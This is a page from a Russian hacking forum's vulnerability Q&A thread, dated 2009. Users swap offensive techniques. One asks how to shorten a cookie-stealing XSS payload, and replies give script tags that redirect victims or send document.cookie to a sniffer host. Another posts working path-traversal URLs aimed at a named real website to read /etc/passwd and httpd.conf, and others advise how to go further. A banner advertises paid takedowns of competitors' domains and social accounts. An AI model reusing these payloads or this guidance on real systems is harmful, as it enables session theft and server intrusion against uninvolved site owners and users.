Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 792 из 2422

792

Опции темы

Поиск в этой теме

Опции просмотра

07.07.2009, 23:24

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

да да, можно юзера создать типа, а вообще проще так
http://www.mysql.ru/docs/man/Adding_users.html

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

08.07.2009, 00:15

Damned_one

Новичок

Регистрация: 24.11.2008

Сообщений: 24

Провел на форуме:
338992

Репутация: 44

Такой вопрос оч волнует - есть ограничение на ввод символов > 16 в XSS конструкции '><script>alert()</script>

Есть ли какой-то способ втиснуться? может сервисом сокращения воспользоваться?
Но тогда каким? И что сокращать: http://sniffer.gif?+document.cookie

это? помогите пожалуста... мозги спарились уже

08.07.2009, 11:22

L I G A

Постоянный

Регистрация: 27.07.2008

Сообщений: 614

Провел на форуме:
4532332

Репутация: 1196

Цитата:

Сообщение от Damned_one

<SCRIPT language=javascript>
location="твой снифер";
</SCRIPT>

09.07.2009, 00:32

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

Провел на форуме:
1754802

Репутация: 380

Цитата:

Сообщение от L I G A

<SCRIPT language=javascript>
location="твой снифер";
</SCRIPT>

Процитирую тебя же 'Сам то понял что написал?', во первых нах ему переадресация без плушек и тд и судя по 'твой снифер' ты собераешься лить это снифер а не на фейк ? Во вторых - 16 символ обозначает 16 символов а не 66.

09.07.2009, 14:26

L I G A

Постоянный

Регистрация: 27.07.2008

Сообщений: 614

Провел на форуме:
4532332

Репутация: 1196

Цитата:

Сообщение от PaCo

я понял что написал,поздравляю что пощитал символы,глянул на глаз посколько в "<script>img=new Image(); img.src="http://сsite/snif/picture.gif"+document.cookie;</script>" будет на много больше символов,"твой снифер" я написал условно, да там куки не будет,но за то он смог бы перенаправлять юзеров на любые ресурсы в том числе и фэйки.

08.07.2009, 00:16

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Запрос метода GET или POST?
Вааще если GET то врядтле ограничят.
А если через POST то в инпуте есть ограничение.
Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.

Последний раз редактировалось Ctacok; 08.07.2009 в 00:20..

08.07.2009, 11:19

L I G A

Постоянный

Регистрация: 27.07.2008

Сообщений: 614

Провел на форуме:
4532332

Репутация: 1196

Цитата:

Сообщение от Ctacok

>>Вааще если GET то врядтле ограничят.
бред

PHP код:


		
			
<?php

if($_GET['hehe'] and strlen($_GET['hehe'])<16)

{

echo 'ok';

}else{

exit;

}

?>

>>А если через POST то в инпуте есть ограничение.
<input type=text name="rate" size=12 maxlength=8>
ГЕТ или ПОСТ все равно будет ограничение

>>Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.
сам понял что написал?

08.07.2009, 11:19

farpost

Познающий

Регистрация: 16.05.2009

Сообщений: 42

Провел на форуме:
190310

Репутация: 7

http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

Возможно ли сдесь найти логи? (по стандартным путям не нашёл)

08.07.2009, 11:24

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Цитата:

Сообщение от farpost

На счет путей не знаю, но можно найти полный путь до сайта. В файле httpd.conf ищеть DocumentRoot... Вот он "/var/www/html"... Попробуй пути еще раз из тех, что ettee давал. Вот - http://forum.antichat.ru/thread49775.html

#10

08.07.2009, 12:41

farpost

Познающий

Регистрация: 16.05.2009

Сообщений: 42

Провел на форуме:
190310

Репутация: 7

Цитата:

Сообщение от Tigger

DocumentRoot... Вот он "/var/www/html"...

Внизу есть вот это

Цитата:

<VirtualHost *:80>
ServerName localhost
DocumentRoot "/var/www/html"
<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>

По-моему это значит что папка доступна только для 127.0.0.1. Или нет?? По крайней мере скрипты по этому пути не читаются

Страница 792 из 2422

792

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules